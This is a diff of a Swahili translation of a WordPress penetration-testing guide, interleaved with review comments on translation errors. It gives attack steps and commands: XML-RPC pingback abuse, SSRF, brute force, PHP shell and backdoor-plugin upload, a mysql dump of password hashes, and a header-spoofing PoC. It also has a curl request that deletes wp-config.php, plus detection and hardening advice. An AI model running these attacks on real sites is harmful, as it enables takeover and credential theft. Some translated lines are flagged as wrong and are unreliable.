**DDoS au port scanning**
Ikiwa unaweza kupata method _**pingback.ping**_ ndani ya orodha, unaweza kuifanya Wordpress itume ombi lolote kwa host/port yoyote.\
Hii inaweza kutumika kuomba **maelfu** ya **Wordpress** **sites** kufikia **eneo** moja (kwa hivyo **DDoS** itasababisha eneo hilo) au unaweza kuitumia kufanya **Wordpress** i**scan** mtandao wa ndani (unaweza kuainisha port yoyote).
Ikiwa unaweza kupata method _**pingback.ping**_ ndani ya orodha unaweza kufanya Wordpress itume ombi lolote kwa host/port yoyote.\
Hii inaweza kutumika kuomba **maelfu** ya Wordpress **sites** ziweze **access** eneo moja (hivyo kusababisha **DDoS** katika eneo hilo) au unaweza kuitumia kufanya **Wordpress** scan baadhi ya mtandao wa ndani (unaweza kuonyesha port yoyote).
```html
<methodCall>
<methodName>pingback.ping</methodName>
@ -191,9 +191,9 @@ Hii inaweza kutumika kuomba **maelfu** ya **Wordpress** **sites** kufikia **eneo
```
![](../../images/1_JaUYIZF8ZjDGGB7ocsZC-g.png)
Ikiwa unapata **faultCode** yenye thamani **kubwa zaidi** kuliko **0** (17), ina maana port iko wazi.
Ikiwa unapokea **faultCode** yenye thamani **kubwa kuliko** **0** (17), ina maana port iko wazi.
Angalia matumizi ya **`system.multicall`** katika sehemu iliyopita ili kujifunza jinsi ya kuitumia vibaya ili kusababisha DDoS.
Angalia matumizi ya **`system.multicall`** katika sehemu iliyopita ili ujifunze jinsi ya kutumia vibaya njia hii kusababisha DDoS.
**DDoS**
```html
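Review bot: the "Bypass 2FA" and "DDoS au port scanning" parts describe how `pingback.ping` and `system.multicall` are abused but, unlike the wp-cron section that recommends disabling Wp-Cron, give no mitigation; add a line that sites which do not need XML-RPC should disable `xmlrpc.php` (or at least the pingback methods) and that outbound pingback requests to arbitrary host/port are worth monitoring, so the section ends with something a site owner can act on.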
@ -209,15 +209,15 @@ Angalia matumizi ya **`system.multicall`** katika sehemu iliyopita ili kujifunza
### wp-cron.php DoS
Faili hii kawaida huwa ndani ya root ya tovuti ya Wordpress: **`/wp-cron.php`**\
Wakati faili hii inapotumiwa, huanzishwa "**heavy**" MySQL **query**, hivyo inaweza kutumika na **attackers** kusababisha **DoS**.\
Pia, kwa default, `wp-cron.php` inaitwa kila wakati ukurasa unapopakiwa (mara zote mteja anapoomba ukurasa wowote wa Wordpress), jambo ambalo kwenye tovuti zenye trafiki kubwa linaweza kusababisha matatizo (DoS).
Faili hii kawaida huwa kwenye mzizi wa tovuti ya Wordpress: **`/wp-cron.php`**\
Wakati faili hii inapo **accessed** hufanywa "**heavy**" MySQL **query**, hivyo inaweza kutumika na **attackers** kusababisha **DoS**.\
Zaidi ya hayo, kwa default, `wp-cron.php` huwa inaitwa kila upakiaji wa ukurasa (wakati wowote client anapohitaji ukurasa wowote wa Wordpress), ambayo katika tovuti zenye trafiki kubwa inaweza kusababisha matatizo (DoS).
Inashauriwa kuzima Wp-Cron na kuunda cronjob halisi ndani ya host ambayo itaendesha vitendo vinavyohitajika kwa vipindi vya kawaida (bila kusababisha matatizo).
Inapendekezwa kuzima Wp-Cron na kuunda cronjob halisi ndani ya host inayotekeleza vitendo vinavyohitajika kwa vipindi vya kawaida (bila kusababisha matatizo).
### /wp-json/oembed/1.0/proxy - SSRF
Jaribu kufikia _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ na tovuti ya Worpress inaweza kutuma ombi kwako.
Jaribu kufikia _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ na Worpress site inaweza kutuma ombi kwako.
This is the response when it doesn't work:
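Review bot: "worpress-site.com" and "Worpress site" in the oembed proxy SSRF sentence are typos carried over from the old line; fix them to "wordpress-site.com" / "Wordpress site" in the new line. The mixed "inapo **accessed** hufanywa" in the wp-cron bullet should also be fully Swahili ("inapofikiwa") or keep the old "inapotumiwa".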
@ -230,32 +230,32 @@ This is the response when it doesn't work:
https://github.com/t0gu/quickpress/blob/master/core/requests.go
{{#endref}}
Chombo hiki kinakagua kama **methodName: pingback.ping** na njia **/wp-json/oembed/1.0/proxy** zipo; ikiwa zipo, hujaribu ku-exploit.
Zana hii huangalia kama **methodName: pingback.ping** na kwa path **/wp-json/oembed/1.0/proxy** na ikiwa ipo, inajaribu ku-exploit yao.
## Zana za Otomatiki
## Zana za Kiotomatiki
```bash
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
#You can try to bruteforce the admin user using wpscan with "-U admin"
```
## Pata ufikiaji kwa kubadilisha bit
## Kupata ufikiaji kwa kubadilisha bit
Zaidi ya kuwa shambulio halisi, hili ni jambo la ajabu. Katika CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) ulingeweza kubadilisha bit 1 kwenye faili yoyote ya wordpress. Hivyo ulingeweza kubadilisha nafasi `5389` ya faili `/var/www/html/wp-includes/user.php` ili ku-NOP operesheni ya NOT (`!`).
Hii ni zaidi ya shambulio halisi; ni jambo la udadisi. Katika CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man] unaweza kubadilisha bit 1 kutoka kwenye faili yoyote ya wordpress. Kwa hivyo unaweza kubadili nafasi `5389` ya faili `/var/www/html/wp-includes/user.php` ili kuifanya operesheni ya NOT (`!`) kuwa NOP.
```php
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(
```
## **Paneli RCE**
## **RCE ya Paneli**
Kubadilisha php ya theme inayotumika (admin credentials needed)
**Badilisha php kutoka kwenye theme inayotumika (inahitaji admin credentials)**
Appearance → Theme Editor → 404 Template (kwa upande wa kulia)
Badilisha maudhui kwa php shell:
Badilisha yaliyomo kwa php shell:
![](<../../images/image (384).png>)
Tafuta mtandaoni jinsi ya kufikia ukurasa uliosasishwa. Katika kesi hii unapaswa kufikia hapa: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
Tafuta kwenye intaneti jinsi unavyoweza kufikia ukurasa huo uliosasishwa. Katika kesi hii lazima utembelee hapa: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
### MSF
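Review bot: the rewritten one-bit sentence loses the link target: `Katika CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man] unaweza ...` has the square brackets but no `(url)` part, so it no longer renders as a link, whereas the replaced line kept the full `[...](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man)`. The new opening `Hii ni zaidi ya shambulio halisi; ni jambo la udadisi.` also reads as "this is more than a real attack", which inverts the intended "more a curiosity than a real attack"; `Badala ya kuwa shambulio halisi, hili ni jambo la udadisi.` keeps the meaning.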
@ -269,8 +269,8 @@ kupata session.
### PHP plugin
Inawezekana kupakia faili .php kama plugin.\
Tengeneza php backdoor yako kwa mfano:
Inawezekana kupakia .php files kama plugin.\
Tengeneza php backdoor yako kwa kutumia, kwa mfano:
![](<../../images/image (183).png>)
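Review bot: `Inawezekana kupakia .php files kama plugin.` mixes English (`.php files`) into an otherwise Swahili sentence, and the replaced line already had the correct `faili .php`; prefer `faili za .php`.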
@ -286,44 +286,44 @@ Bonyeza Procced:
![](<../../images/image (70).png>)
Inawezekana hili halitaonekana kufanya chochote, lakini ukienda Media, utaona shell yako imepakizwa:
Inaonekana hii haitafanya chochote, lakini ukichagua Media, utaona shell yako imepakiwa:
![](<../../images/image (462).png>)
Fikia na utaona URL ya kutekeleza reverse shell:
Fikia faili hiyo na utaona URL ya kutekeleza reverse shell:
![](<../../images/image (1006).png>)
### Uploading and activating malicious plugin
### Kupakia na kuamsha plugin hatari
Njia hii inahusisha usakinishaji wa plugin hatari inayoonekana kuwa na uharibifu na inaweza kutumika kupata web shell. Mchakato huu unafanyika kupitia WordPress dashboard kama ifuatavyo:
Njia hii inahusisha usakinishaji wa plugin hatari inayojulikana kuwa na udhaifu na inaweza kutumika kupata web shell. Mchakato huu unafanywa kupitia WordPress dashboard kama ifuatavyo:
1. **Plugin Acquisition**: Plugin hupatikana kutoka chanzo kama Exploit DB kama [**here**](https://www.exploit-db.com/exploits/36374).
2. **Plugin Installation**:
- Navigate to the WordPress dashboard, then go to `Dashboard > Plugins > Upload Plugin`.
- Pakia faili la zip la plugin uliopakua.
3. **Plugin Activation**: Mara plugin imefanikiwa kusakinishwa, inapaswa kuamshwa kupitia dashboard.
- Nenda kwenye WordPress dashboard, kisha nenda `Dashboard > Plugins > Upload Plugin`.
- Upload zip file ya plugin uliopakua.
3. **Plugin Activation**: Mara plugin inapowekwa kwa mafanikio, lazima iamshwe kupitia dashboard.
4. **Exploitation**:
- Ukiwa na plugin "reflex-gallery" imewekwa na kuamshwa, inaweza kutumika kwa sababu inajulikana kuwa vulnerable.
- Metasploit framework inatoa exploit kwa kudumu hili. Kwa kuingiza module inayofaa na kutekeleza amri maalum, session ya meterpreter inaweza kuanzishwa, ikitoa ufikiaji usioidhinishwa kwenye tovuti.
- Inatambuliwa kuwa hii ni mojawapo tu ya njia nyingi za kuchuja tovuti ya WordPress.
- Ukiwa na plugin "reflex-gallery" imewekwa na kuiamsha, inaweza kutumika kwa sababu inajulikana kuwa na udhaifu.
- Metasploit framework inatoa exploit kwa udhaifu huu. Kwa kupakia module inayofaa na kutekeleza amri maalum, session ya meterpreter inaweza kuanzishwa, ikitoa ufikaji usioidhinishwa kwenye tovuti.
- Inafahamika kuwa hii ni mojawapo tu ya njia nyingi za kutumia udhaifu kwenye tovuti ya WordPress.
Yaliyomo yanajumuisha msaada wa picha unaoonyesha hatua kwenye WordPress dashboard za kusakinisha na kuamsha plugin. Hata hivyo, ni muhimu kutambua kuwa kutumia udhaifu kwa njia hii ni kinyume cha sheria na si ya maadili bila ruhusa sahihi. Taarifa hii inapaswa kutumika kwa uwajibikaji na tu katika muktadha wa kisheria, kama pentesting yenye idhini wazi.
Yaliyomo yanajumuisha msaada wa kuona unaoonyesha hatua kwenye WordPress dashboard za kusakinisha na kuamsha plugin. Hata hivyo, ni muhimu kutambua kwamba kutumia udhaifu kwa njia hii ni kinyume cha sheria na haifuli maadili bila ruhusa sahihi. Taarifa hizi zitatumika kwa uwajibikaji na tu katika muktadha wa kisheria, kama pentesting na idhini wazi.
**For more detailed steps check:** [**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/)
## From XSS to RCE
## Kutoka XSS hadi RCE
- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ ni script iliyoundwa kuinua uvunjaji wa **Cross-Site Scripting (XSS)** hadi **Remote Code Execution (RCE)** au uwapo wa udhaifu mwingine mkali katika WordPress. Kwa maelezo zaidi angalia [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Inatoa **support for Wordpress Versions 6.X.X, 5.X.X and 4.X.X. and allows to:**
- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ ni script iliyoundwa kuinua udhaifu wa **Cross-Site Scripting (XSS)** hadi **Remote Code Execution (RCE)** au udhaifu mwingine wa hatari katika WordPress. Kwa habari zaidi angalia [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Inatoa **support for Wordpress Versions 6.X.X, 5.X.X and 4.X.X. and allows to:**
- _**Privilege Escalation:**_ Inaunda user katika WordPress.
- _**(RCE) Custom Plugin (backdoor) Upload:**_ Pakia custom plugin yako (backdoor) kwenye WordPress.
- _**(RCE) Custom Plugin (backdoor) Upload:**_ Upload custom plugin yako (backdoor) kwenye WordPress.
- _**(RCE) Built-In Plugin Edit:**_ Hariri Built-In Plugins katika WordPress.
- _**(RCE) Built-In Theme Edit:**_ Hariri Built-In Themes katika WordPress.
- _**(Custom) Custom Exploits:**_ Custom Exploits kwa Third-Party WordPress Plugins/Themes.
## Post Exploitation
Chukua usernames na passwords:
Toa majina ya watumiaji na nywila:
```bash
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
```
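Review bot: `haifuli maadili` in the rewritten closing paragraph is a typo for `haifuati maadili`. In the exploitation bullet, `Ukiwa na plugin "reflex-gallery" imewekwa na kuiamsha` mixes a passive (`imewekwa`) with an active infinitive (`kuiamsha`); `imewekwa na kuamshwa`, as in the replaced line, agrees. The WPXStrike bullet `Upload custom plugin yako (backdoor) kwenye WordPress.` also reverts the verb to English where the replaced line had `Pakia`.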
@ -333,27 +333,27 @@ mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE
```
## Wordpress Plugins Pentest
### Uso wa Mashambulizi
### Attack Surface
Kujua jinsi plugin ya Wordpress inaweza kufichua utendaji ni muhimu ili kupata udhaifu katika utendaji wake. Unaweza kuona jinsi plugin inaweza kufichua utendaji katika pointi zifuatazo na baadhi ya mifano ya plugins zilizo na udhaifu katika [**this blog post**](https://nowotarski.info/wordpress-nonce-authorization/).
Kujua jinsi plugin ya Wordpress inaweza kuonyesha functionality ni muhimu ili kupata vulnerabilities kwenye kazi zake. Unaweza kuona jinsi plugin inaweza kuonyesha functionality katika vidokezo vifuatavyo na baadhi ya mifano ya plugins zilizo na udhaifu katika [**this blog post**](https://nowotarski.info/wordpress-nonce-authorization/).
- **`wp_ajax`**
Moja ya njia ambazo plugin inaweza kufichua kazi kwa watumiaji ni kupitia AJAX handlers. Hizi zinaweza kuwa na mende za mantiki, idhinishaji, au uthibitishaji. Zaidi ya hayo, ni jambo la kawaida kwamba kazi hizi zitategemea uthibitishaji na idhinishaji kwa kuwepo kwa wordpress nonce ambayo **mtumiaji yoyote aliyethibitishwa kwenye mfumo wa Wordpress anaweza kuwa nayo** (bila kujali jukumu lake).
Moja ya njia ambazo plugin inaweza kuonyesha functions kwa watumiaji ni kupitia AJAX handlers. Hizi zinaweza kuwa na bug za logic, authorization, au authentication. Zaidi ya hayo, mara nyingi functions hizi zinategemea authentication na authorization kwa kuwepo kwa wordpress nonce ambayo **mtumiaji yeyote aliye authenticated katika instance ya Wordpress anaweza kuwa nayo** (bila kujali role yake).
These are the functions that can be used to expose a function in a plugin:
```php
add_action( 'wp_ajax_action_name', array(&$this, 'function_name'));
add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));
```
**Matumizi ya `nopriv` hufanya endpoint ipatikane kwa watumiaji wote (hata wale wasiojidhinishwa).**
**Matumizi ya `nopriv` hufanya endpoint ipatikane kwa watumiaji wote (hata wale wasiothibitishwa).**
> [!CAUTION]
> Zaidi ya hayo, ikiwa function inabaini tu idhini ya mtumiaji kwa kutumia `wp_verify_nonce`, function hiyo inathibitisha tu kwamba mtumiaji ameingia, kawaida haisemi jukumu la mtumiaji. Hivyo watumiaji wenye ruhusa ndogo wanaweza kufikia vitendo vya watumiaji wenye ruhusa kubwa.
> Zaidi ya hayo, ikiwa function inacheki tu idhini ya mtumiaji kwa kutumia `wp_verify_nonce`, function hii inabaini tu kwamba mtumiaji ameingia katika mfumo; kawaida haicheki jukumu (role) la mtumiaji. Kwa hivyo watumiaji wenye vibali vidogo wanaweza kupata ufikiaji wa vitendo vyenye vibali vya juu.
- **REST API**
Pia inawezekana kufichua functions kutoka wordpress kwa kusajili REST API kwa kutumia function `register_rest_route`:
Inawezekana pia kufichua functions kutoka wordpress kwa kusajili REST API kwa kutumia function `register_rest_route`:
```php
register_rest_route(
$this->namespace, '/get/', array(
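Review bot: the context line `These are the functions that can be used to expose a function in a plugin:` is still English, so this hunk leaves the `wp_ajax` subsection half translated; `Hizi ndizo functions zinazoweza kutumika kufichua function katika plugin:` would match the surrounding lines. The wording changes here (`wasiothibitishwa`, `haicheki jukumu (role) la mtumiaji`) are improvements.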
@ -363,21 +363,21 @@ $this->namespace, '/get/', array(
)
);
```
The `permission_callback` ni callback — function inayokagua kama mtumiaji fulani ameidhinishwa kuita API method.
The `permission_callback` ni callback ya function inayokagua kama mtumiaji fulani ameidhinishwa kuita wito wa method ya API.
**Ikiwa function ya built-in `__return_true` itatumiwa, itapuuza ukaguzi wa ruhusa za mtumiaji.**
**Ikiwa function ya built-in `__return_true` itatumika, itapuuza ukaguzi wa ruhusa za mtumiaji.**
- **Direct access to the php file**
Bila shaka, Wordpress inatumia PHP na faili ndani ya plugins zinapatikana moja kwa moja kutoka kwenye web. Hivyo, ikiwa plugin inafichua functionality yoyote iliyo na udhaifu ambayo inasababisha tu kwa kufikia faili hiyo, itakuwa inaweza kutumiwa na mtumiaji yeyote.
Bila shaka, Wordpress inatumia PHP na faili ndani ya plugins zinaweza kupatikana moja kwa moja kutoka kwenye web. Hivyo, ikiwa plugin inaonyesha functionality yoyote yenye udhaifu ambayo inachochewa kwa kuingilia tu faili, itakuwa inaweza kutumika na mtumiaji yeyote.
### Trusted-header REST impersonation (WooCommerce Payments ≤ 5.6.1)
Baadhi ya plugins hufanya “trusted header” shortcuts kwa internal integrations au reverse proxies kisha hutumia header hiyo kuweka muktadha wa mtumiaji wa sasa kwa REST requests. Ikiwa header haifungwi kwa njia ya kriptografia kwenye request na component ya upstream, mshambuliaji anaweza kuiga header hiyo (spoof) na kufikia privileged REST routes kama administrator.
Baadhi ya plugins hutekeleza “trusted header” shortcuts kwa ajili ya internal integrations au reverse proxies na kisha hutumia header hiyo kuweka muktadha wa mtumiaji wa sasa kwa REST requests. Ikiwa header hiyo haijafungamanishwa kwa cryptographically kwenye request na sehemu ya upstream, mshambuliaji anaweza ku-spoof na kufikia privileged REST routes kama administrator.
- Athari: kupanuka kwa ruhusa bila uthibitisho hadi admin kwa kuunda administrator mpya kupitia core users REST route.
- Example header: `X-Wcpay-Platform-Checkout-User: 1` (inalazimisha user ID 1, kwa kawaida akaunti ya kwanza ya administrator).
- Exploited route: `POST /wp-json/wp/v2/users` with an elevated role array.
- Impact: kuongezeka kwa privilage bila uthibitisho hadi admin kwa kuunda administrator mpya kupitia core users REST route.
- Example header: `X-Wcpay-Platform-Checkout-User: 1` (inalazimisha user ID 1, kawaida akaunti ya kwanza ya administrator).
- Exploited route: `POST /wp-json/wp/v2/users` na array ya role iliyoinuliwa.
PoC
```http
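Review bot: `kuongezeka kwa privilage bila uthibitisho` has a typo (`privilage` for `privilege`). `callback ya function inayokagua kama mtumiaji fulani ameidhinishwa kuita wito wa method ya API` doubles the verb (`kuita wito`, literally "to call a call"); `ameidhinishwa kuita method ya API` is enough. `na array ya role iliyoinuliwa` renders "elevated role array" loosely; `na array ya role yenye jukumu la juu` is clearer.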
@ -393,38 +393,38 @@ Content-Length: 114
```
Kwa nini inafanya kazi
- Plugin inafananisha header inayodhibitiwa na mteja na hali ya uthibitisho na inaruka ukaguzi wa capability.
- WordPress core inatarajia uwezo wa `create_users` kwa route hii; plugin hack inaukwepa kwa kuweka moja kwa moja muktadha wa current user kutoka kwa header.
- Plugin inamezea header inayodhibitiwa na mteja kwa hali ya authentication na inaruka ukaguzi wa capabilities.
- WordPress core inatarajia capability ya `create_users` kwa route hii; plugin hack inaitwepuka kwa kuweka moja kwa moja context ya current user kutoka kwa header.
Vionyeshi vya mafanikio vinavyotarajiwa
Viuashiria vya mafanikio yanayotarajiwa
- HTTP 201 na JSON body inayobainisha user iliyoundwa.
- HTTP 201 na body ya JSON inayoelezea user iliyoundwa.
- Admin user mpya inaonekana katika `wp-admin/users.php`.
Orodha ya kugundua
Orodha ya ukaguzi wa kugundua
- Grep kwa ajili ya `getallheaders()`, `$_SERVER['HTTP_...']`, au vendor SDKs zinazosomea custom headers ili kuweka muktadha wa mtumiaji (mfano, `wp_set_current_user()`, `wp_set_auth_cookie()`).
- Pitia REST registrations kwa callbacks zenye privileged actions ambazo hazina ukaguzi thabiti wa `permission_callback` na badala yake zinategemea request headers.
- Angalia matumizi ya core user-management functions (`wp_insert_user`, `wp_create_user`) ndani ya REST handlers ambazo zinazuia tu kwa thamani za header.
- Grep kwa `getallheaders()`, `$_SERVER['HTTP_...']`, au vendor SDKs zinazosomea headers maalum kuweka user context (mfano, `wp_set_current_user()`, `wp_set_auth_cookie()`).
- Kagua REST registrations kwa privileged callbacks ambazo hazina ukaguzi madhubuti wa `permission_callback` na badala yake zinategemea request headers.
- Angalia matumizi ya core user-management functions (`wp_insert_user`, `wp_create_user`) ndani ya REST handlers ambazo zinalindwa tu kwa thamani za header.
Kuimarisha usalama
Kuimarisha
- Usipatikane uthibitisho au idhini kutoka kwa headers zinazodhibitiwa na mteja.
- Ikiwa reverse proxy inapaswa kuingiza identity, ifunge trust kwenye proxy na futa nakala za inbound (mfano, `unset X-Wcpay-Platform-Checkout-User` kwenye edge), kisha pita token iliyosainiwa na uiweke wazi server-side.
- Kwa REST routes zinazofanya vitendo vya privileged, sitauli ukaguzi wa `current_user_can()` na tumia `permission_callback` kali (USITUMIE `__return_true`).
- Tumia uthibitisho wa first-party (cookies, application passwords, OAuth) badala ya “impersonation” kupitia header.
- Usitoke uthibitisho au idhini kutoka kwa headers zinazodhibitiwa na mteja.
- Ikiwa reverse proxy lazima iingize identity, iweke mwisho wa kuamini kwenye proxy na ifute nakala za inbound (mfano, `unset X-Wcpay-Platform-Checkout-User` kwenye edge), kisha pita token iliyosainiwa na iverify server-side.
- Kwa REST routes zinazofanya vitendo vya privileged, inahitaji ukaguzi wa `current_user_can()` na `permission_callback` kali (USITUMIE `__return_true`).
- Tilie more first-party auth (cookies, application passwords, OAuth) badala ya “impersonation” kupitia headers.
References: ona viungo mwishoni mwa ukurasa huu kwa kesi ya umma na uchambuzi mpana.
References: angalia viungo mwishoni mwa ukurasa huu kwa kesi ya umma na uchambuzi mpana.
### Unauthenticated Arbitrary File Deletion via wp_ajax_nopriv (Litho Theme <= 3.0)
WordPress themes and plugins frequently expose AJAX handlers through the `wp_ajax_` and `wp_ajax_nopriv_` hooks. When the **_nopriv_** variant is used **the callback becomes reachable by unauthenticated visitors**, so any sensitive action must additionally implement:
WordPress themes na plugins mara nyingi huonyesha AJAX handlers kupitia `wp_ajax_` na `wp_ajax_nopriv_` hooks. Wakati toleo la **_nopriv_** linapotumika **callback inafikiwa na wageni wasio na uthibitisho**, hivyo kitendo chochote chenye siri kinapaswa kutekeleza pia:
1. A **capability check** (e.g. `current_user_can()` or at least `is_user_logged_in()`), and
2. A **CSRF nonce** validated with `check_ajax_referer()` / `wp_verify_nonce()`, and
3. **Strict input sanitisation / validation**.
1. Ukaguzi wa **capability** (mfano `current_user_can()` au angalau `is_user_logged_in()`), na
2. CSRF nonce iliyo validated na `check_ajax_referer()` / `wp_verify_nonce()`, na
3. Uwekaji wazi wa usafi / uthibitishaji wa pembejeo.
The Litho multipurpose theme (< 3.1) forgot those 3 controls in the *Remove Font Family* feature and ended up shipping the following code (simplified):
The Litho multipurpose theme (< 3.1) alisahau udhibiti huo wa 3 katika kipengele cha *Remove Font Family* na hatimaye ilisambaza code ifuatayo (imefupishwa):
```php
function litho_remove_font_family_action_data() {
if ( empty( $_POST['fontfamily'] ) ) {
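Review bot: `Tilie more first-party auth (cookies, application passwords, OAuth) badala ya “impersonation” kupitia headers.` is garbled (`Tilie more` is neither Swahili nor English); the replaced line `Tumia uthibitisho wa first-party ...` was correct. Further regressions in this hunk: `Plugin inamezea header` (`kumeza`, to swallow) for "treats the header as authentication state", `inaitwepuka` for `inaikwepa`, `iverify server-side` for `ithibitishe upande wa server`, and the third list item `Uwekaji wazi wa usafi / uthibitishaji wa pembejeo` drops "Strict" (`Usafishaji / uthibitishaji madhubuti wa pembejeo`). `The Litho multipurpose theme (< 3.1) alisahau` uses the human-class verb form; `ilisahau` matches the `ilisambaza` later in the same sentence.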
@ -443,29 +443,29 @@ die();
add_action( 'wp_ajax_litho_remove_font_family_action_data', 'litho_remove_font_family_action_data' );
add_action( 'wp_ajax_nopriv_litho_remove_font_family_action_data', 'litho_remove_font_family_action_data' );
```
Masuala yaliyotolewa na kipande hiki cha msimbo:
Masuala yaliyotokana na kipande hiki:
* **Unauthenticated access** hook ya `wp_ajax_nopriv_` imeandikishwa.
* **Unauthenticated access** `wp_ajax_nopriv_` hook imejisajili.
* **No nonce / capability check** mgeni yeyote anaweza kufikia endpoint.
* **No path sanitisation** kamba ya `fontfamily` inayodhibitiwa na mtumiaji inaunganishwa na njia ya filesystem bila kuchujwa, ikiruhusu traversal ya kawaida ya `../../`.
* **No path sanitisation** kamba ya `fontfamily` inayodhibitiwa na mtumiaji imeunganishwa kwenye filesystem path bila kuchujwa, ikiruhusu classic `../../` traversal.
#### Uvamizi
#### Utekelezaji
Mshambuliaji anaweza kufuta faili au saraka yoyote **chini ya saraka ya msingi ya uploads** (kawaida `<wp-root>/wp-content/uploads/`) kwa kutuma ombi moja la HTTP POST:
Mshambuliaji anaweza kufuta faili au saraka yoyote **chini ya uploads base directory** (kawaida `<wp-root>/wp-content/uploads/`) kwa kutuma ombi moja la HTTP POST:
```bash
curl -X POST https://victim.com/wp-admin/admin-ajax.php \
-d 'action=litho_remove_font_family_action_data' \
-d 'fontfamily=../../../../wp-config.php'
```
Kwa sababu `wp-config.php` iko nje ya *uploads*, mfululizo wa `../` mara nne unatosha kwenye installation chaguomsingi. Kufuta `wp-config.php` kunalazimisha WordPress kuingia kwenye *mwongozo wa ufungaji* kwenye ziara inayofuata, na kuwezesha kuchukua udhibiti wa tovuti nzima (mshambuliaji anatoa tu usanidi mpya wa DB na kuunda admin user).
Kwa sababu `wp-config.php` iko nje ya *uploads*, mfululizo wa `../` mara nne unatosha kwenye ufungaji wa chaguo-msingi. Kufuta `wp-config.php` kunalazimisha WordPress kuingia kwenye *musaidizi wa usakinishaji* kwenye ziara inayofuata, kuruhusu kunyongwa kwa tovuti kwa ukamilifu (mshambuliaji anatakiwa tu kutoa usanidi mpya wa DB na kuunda mtumiaji admin).
Malengo mengine yenye athari ni plugin/theme `.php` files (kuharibu security plugins) au sheria za `.htaccess`.
Madhumuni mengine yenye athari ni pamoja na plugin/theme `.php` files (kwa kuvunja security plugins) au sheria za `.htaccess`.
#### Orodha ya ugunduzi
#### Orodha ya kugundua
* Iwapo callback yoyote ya `add_action( 'wp_ajax_nopriv_...')` inaita filesystem helpers (`copy()`, `unlink()`, `$wp_filesystem->delete()`, n.k.).
* Kuunganisha ingizo la mtumiaji lisilosafishwa ndani ya njia za faili (angalia `$_POST`, `$_GET`, `$_REQUEST`).
* Kukosekana kwa `check_ajax_referer()` na `current_user_can()`/`is_user_logged_in()`.
* Kila callback ya `add_action( 'wp_ajax_nopriv_...')` inayokiita filesystem helpers (`copy()`, `unlink()`, `$wp_filesystem->delete()`, n.k.).
* Kuunganisha pembejeo za mtumiaji zisizosafishwa ndani ya paths (tafuta `$_POST`, `$_GET`, `$_REQUEST`).
* Ukosefu wa `check_ajax_referer()` na `current_user_can()`/`is_user_logged_in()`.
#### Kuimarisha
```php
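Review bot: `kuruhusu kunyongwa kwa tovuti kwa ukamilifu` says "allowing the site to be hanged"; the source means full site takeover, which the replaced line `kuwezesha kuchukua udhibiti wa tovuti nzima` had right. Likewise `Madhumuni mengine yenye athari` ("other purposes") should stay `Malengo mengine` ("other targets"), and `wp_ajax_nopriv_ hook imejisajili` (registered itself) should be the passive `imesajiliwa`.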
@ -487,16 +487,16 @@ add_action( 'wp_ajax_litho_remove_font_family_action_data', 'secure_remove_font_
// 🔒 NO wp_ajax_nopriv_ registration
```
> [!TIP]
> **Kila wakati** chukulia operesheni yoyote ya kuandika/kufuta kwenye disk kuwa yenye hadhi ya juu na hakikisha tena:
> • Authentication • Authorisation • Nonce • Input sanitisation • Path containment (e.g. via `realpath()` plus `str_starts_with()`).
> **Daima** chukulia operesheni yoyote ya kuandika/kufuta kwenye disk kama yenye ruhusa ya juu na hakikisha mara mbili:
> • Uthibitishaji • Uidhinishaji • Nonce • Usafishaji wa ingizo • Ushikaji wa njia (kwa mfano kupitia `realpath()` pamoja na `str_starts_with()`).
---
### Privilege escalation kupitia urejeshaji wa stale role na missing authorization (ASE "View Admin as Role")
### Kuongezeka kwa ruhusa kupitia urejeshaji wa role zilizo zamani na kukosa uidhinishaji (ASE "View Admin as Role")
Plugins nyingi zinaweka kipengele cha "view as role" au kubadilisha role kwa muda kwa kuhifadhi role(s) asilia katika user meta ili ziweze kurejeshwa baadaye. Ikiwa njia ya urejesho inategemea tu request parameters (mfano, `$_REQUEST['reset-for']`) na orodha inayotunzwa na plugin bila kuangalia capabilities na valid nonce, hili linakuwa vertical privilege escalation.
Plugins nyingi hufanya utekelezaji wa kipengele cha "view as role" au kubadilisha role kwa muda kwa kuhifadhi role za awali kwenye user meta ili ziweze kurejeshwa baadaye. Ikiwa njia ya urejeshaji inategemea tu vigezo vya ombi (kwa mfano, `$_REQUEST['reset-for']`) na orodha inayotunzwa na plugin bila kukagua capabilities na nonce halali, hili linageuka kuwa kuongezeka kwa ruhusa kwa wima.
Mfano wa ulimwengu halisi ulipatikana katika Admin and Site Enhancements (ASE) plugin (≤ 7.6.2.1). Reset branch ilirejesha roles kulingana na `reset-for=<username>` ikiwa jina la mtumiaji lilionekana katika array ya ndani `$options['viewing_admin_as_role_are']`, lakini haikufanya either check ya `current_user_can()` wala verification ya nonce kabla ya kuondoa current roles na kuirudia kuingiza roles zilizohifadhiwa kutoka user meta `_asenha_view_admin_as_original_roles`:
